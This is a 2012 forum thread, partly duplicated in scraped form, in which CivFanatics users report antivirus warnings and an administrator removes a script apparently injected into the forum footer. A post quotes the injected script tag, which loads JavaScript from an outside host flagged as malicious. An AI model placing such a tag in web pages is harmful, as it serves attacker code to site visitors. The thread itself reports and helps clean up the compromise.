Malware warning on various CFC pages

Mise · Jun 19, 2012, 12:13 PM

I'm getting warnings from my antivirus software (avast) about some weird site on basically all CFC pages. The site is http://www.sslcheck0992.com; it's saying that the site is malicious. There's no way I'm actually going to go to that site to check it out -- maybe someone can do it in a fresh VM. But I've added it to my hosts file, and I suggest you all do too (just like with that www.booklandonline.info or whatever it was).

Anyway, I think someone is putting some dodgy scripts onto CFC. This script is in the source of all pages I've checked:

<script type="text/javascript" async="async" src="http://www.sslcheck0992.com/cms/index.php"></script>

I see that it's got "async" -- I assume this is to prevent the site from hanging on the script, like on www.booklandonline.info did before.

Can the admins please check that the site hasn't been compromised? I recommend users not use the site without an antivirus software...

Thunderfall · Jun 19, 2012, 12:21 PM

Thanks Mise. I have removed it. It's in forum footer like last time.

I will look into it further.

We do plan to upgrade forum in the near future.

Anything you think suspicious, please PM or email me, or post here.

Mise · Jun 19, 2012, 12:35 PM

Thanks for sorting it so quickly, TF!

dusckr87 · Jun 19, 2012, 02:49 PM

Does this have anything to do with why the "back" (or refresh) button on the browser always displayed a blank page, but is now working correctly?

El_Machinae · Jun 21, 2012, 06:44 AM

So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?

Sir_Lancelot · Jun 22, 2012, 01:42 AM

Was the forum hacked or did it come with infected ads? I'm interested in knowing/understanding how this is happening.

aaronlk · Jun 22, 2012, 12:02 PM

Does this have anything to do with these pop-up flash video ads I'm seeing on the site? Or are these ads legitimate?

LucyDuke · Jun 24, 2012, 08:45 PM

Quote:

Originally Posted by El_Machinae

So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?

Could be explained by something else blocking them in the first place.

Sir_Lancelot · Jun 25, 2012, 01:18 AM

Quote:

Originally Posted by El_Machinae

So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus?

It happened over a month ago. Security warning on bad certificate.

Norton did not detect anything at that time, my browser did. I think it was the same way with everyone else who noticed something.

El_Machinae · Jun 26, 2012, 07:33 AM

Yeah, my browser didn't detect it. My Norton didn't detect it. Oh no!

Arwon · Jun 27, 2012, 04:13 PM

My work filter is now flagging this whole site as malware too.

MjM · Jun 27, 2012, 07:07 PM

My AdAware said the whole site was infected as well. What's with this?

The_J · Jun 27, 2012, 07:48 PM

Must be a false positive recognition due to whatever has happened here at the 19th

.
One corporate software solution seems to have caught that, see http://www.stopbadware.org/reports/7...55f2ca5aabe774

Else we seem to be clean:
http://www.google.com/safebrowsing/d...ivfanatics.com
http://www.siteadvisor.com/sites/civfanatics.com

->

City Builder · Jun 29, 2012, 06:28 AM

I just went to unsubscribe from a topic that I must have subscribed to years ago maybe, and got the following warning in Google's Chrome browser:

Warning: Something's Not Right Here!

forums.civfanatics.com contains content from www.weplayciv.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

We have already notified www.weplayciv.com that we found malware on the site. For more about the problems found on www.weplayciv.com, visit the Google Safe Browsing diagnostic page.

-------------------------------
The message in Chrome was coming up after I unsubscribed from a topic and then you get shown the redirect box that then sends you normally back to the topic that you unsubscribed from, from that redirect page is when Google Chrome catches it and pops up the message that I listed above.

The_J · Jun 29, 2012, 06:37 AM

WPC also had a small problem with probably a false positive report some time ago (fixed now). -> you can ignore that warning.

Jun 19, 2012, 12:13 PM	#1
Mise isle of lucy Join Date: Apr 2004 Location: London, UK Posts: 25,079	Malware warning on various CFC pages I'm getting warnings from my antivirus software (avast) about some weird site on basically all CFC pages. The site is http://www.sslcheck0992.com; it's saying that the site is malicious. There's no way I'm actually going to go to that site to check it out -- maybe someone can do it in a fresh VM. But I've added it to my hosts file, and I suggest you all do too (just like with that www.booklandonline.info or whatever it was). Anyway, I think someone is putting some dodgy scripts onto CFC. This script is in the source of all pages I've checked: <script type="text/javascript" async="async" src="http://www.sslcheck0992.com/cms/index.php"></script> I see that it's got "async" -- I assume this is to prevent the site from hanging on the script, like on www.booklandonline.info did before. Can the admins please check that the site hasn't been compromised? I recommend users not use the site without an antivirus software... __________________ Come to fiftychat! It's where downtown hangs out!

Jun 19, 2012, 12:21 PM	#2
Thunderfall Administrator Join Date: Oct 2000 Location: NY, USA Posts: 11,730 Images: 1545	Thanks Mise. I have removed it. It's in forum footer like last time. I will look into it further. We do plan to upgrade forum in the near future. Anything you think suspicious, please PM or email me, or post here. __________________ Thunderfall Weight: 1.0 Value: 161 Cast When used Shock Damage 1 to 25 points on Touch

Jun 19, 2012, 12:35 PM	#3
Mise isle of lucy Join Date: Apr 2004 Location: London, UK Posts: 25,079	Thanks for sorting it so quickly, TF! __________________ Come to fiftychat! It's where downtown hangs out!

Jun 19, 2012, 02:49 PM	#4
dusckr87 Prince Join Date: Feb 2010 Posts: 577	Does this have anything to do with why the "back" (or refresh) button on the browser always displayed a blank page, but is now working correctly? Last edited by dusckr87; Jun 19, 2012 at 03:11 PM.

Jun 21, 2012, 06:44 AM	#5
El_Machinae Colour vision since 2018 Join Date: Nov 2005 Location: Pale Blue Dot youtube=wupToqz1e2g Posts: 30,779	So, uh, I never got any warnings about this or booklandonline. Should I be worried about my anti-virus? __________________ 2.0% of income to true poverty (society only invests 2% to total charity) 0.5% of income to medical R&D (society only invests 0.5% to medical R&D, and leaves mental illness underfunded) eff hunger; eff infant diarrhea; eff malaria; eff polio; eff cancer; eff Alzheimer's; eff depression You and me: pro-actively

Jun 22, 2012, 01:42 AM	#6
Sir_Lancelot Emperor Join Date: Mar 2006 Location: Europe Posts: 1,358	Was the forum hacked or did it come with infected ads? I'm interested in knowing/understanding how this is happening. __________________ The world is not enough...

Jun 22, 2012, 12:02 PM	#7
aaronlk Chieftain Join Date: Dec 2005 Posts: 42	Does this have anything to do with these pop-up flash video ads I'm seeing on the site? Or are these ads legitimate?

Jun 26, 2012, 07:33 AM	#10
El_Machinae Colour vision since 2018 Join Date: Nov 2005 Location: Pale Blue Dot youtube=wupToqz1e2g Posts: 30,779	Yeah, my browser didn't detect it. My Norton didn't detect it. Oh no! __________________ 2.0% of income to true poverty (society only invests 2% to total charity) 0.5% of income to medical R&D (society only invests 0.5% to medical R&D, and leaves mental illness underfunded) eff hunger; eff infant diarrhea; eff malaria; eff polio; eff cancer; eff Alzheimer's; eff depression You and me: pro-actively

Jun 27, 2012, 04:13 PM	#11
Arwon Show me your moves Join Date: Oct 2006 Location: Canberra Posts: 12,262	My work filter is now flagging this whole site as malware too. __________________ He wants a shoe horn, the kind with teeth People should get beat up for statin' their beliefs - TMBG PC: Left/Right: -2.00, Libertarian/Authoritarian: -7.13 Reptilians Anonymous

Jun 27, 2012, 07:07 PM	#12
MjM General Misenhower Join Date: Jun 2004 Location: Britain Posts: 7,079	My AdAware said the whole site was infected as well. What's with this? __________________ Fiftychat: the official chatroom of CFC. Want to play Civ4? Click here and we can get a game going!

Jun 27, 2012, 07:48 PM	#13
The_J Say No 2 Net Validations Join Date: Oct 2008 Location: Germany / Netherlands Posts: 24,851 Images: 51	Must be a false positive recognition due to whatever has happened here at the 19th . One corporate software solution seems to have caught that, see http://www.stopbadware.org/reports/7...55f2ca5aabe774 Else we seem to be clean: http://www.google.com/safebrowsing/d...ivfanatics.com http://www.siteadvisor.com/sites/civfanatics.com -> __________________ Civ4-BtS-Mod "Mars, Now!" BtS: 18 Civs on a world map - and your choice, which! Steam eats the souls of little gamers!!!

Jun 29, 2012, 06:28 AM	#14
City Builder Complicated Complication Join Date: Sep 2006 Location: In your moms basement Posts: 150	I just went to unsubscribe from a topic that I must have subscribed to years ago maybe, and got the following warning in Google's Chrome browser: Warning: Something's Not Right Here! forums.civfanatics.com contains content from www.weplayciv.com, a site known to distribute malware. Your computer might catch a virus if you visit this site. Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else. We have already notified www.weplayciv.com that we found malware on the site. For more about the problems found on www.weplayciv.com, visit the Google Safe Browsing diagnostic page. ------------------------------- The message in Chrome was coming up after I unsubscribed from a topic and then you get shown the redirect box that then sends you normally back to the topic that you unsubscribed from, from that redirect page is when Google Chrome catches it and pops up the message that I listed above.

Jun 29, 2012, 06:37 AM	#15
The_J Say No 2 Net Validations Join Date: Oct 2008 Location: Germany / Netherlands Posts: 24,851 Images: 51	WPC also had a small problem with probably a false positive report some time ago (fixed now). -> you can ignore that warning. __________________ Civ4-BtS-Mod "Mars, Now!" BtS: 18 Civs on a world map - and your choice, which! Steam eats the souls of little gamers!!!

Powered by vBulletin® Copyright ©2000 - 2013, Jelsoft Enterprises Ltd. This site is copyright © Civilization Fanatics' Center.
Support CFC: Amazon.com \| Amazon UK \| Amazon DE \| Amazon CA \| Amazon FR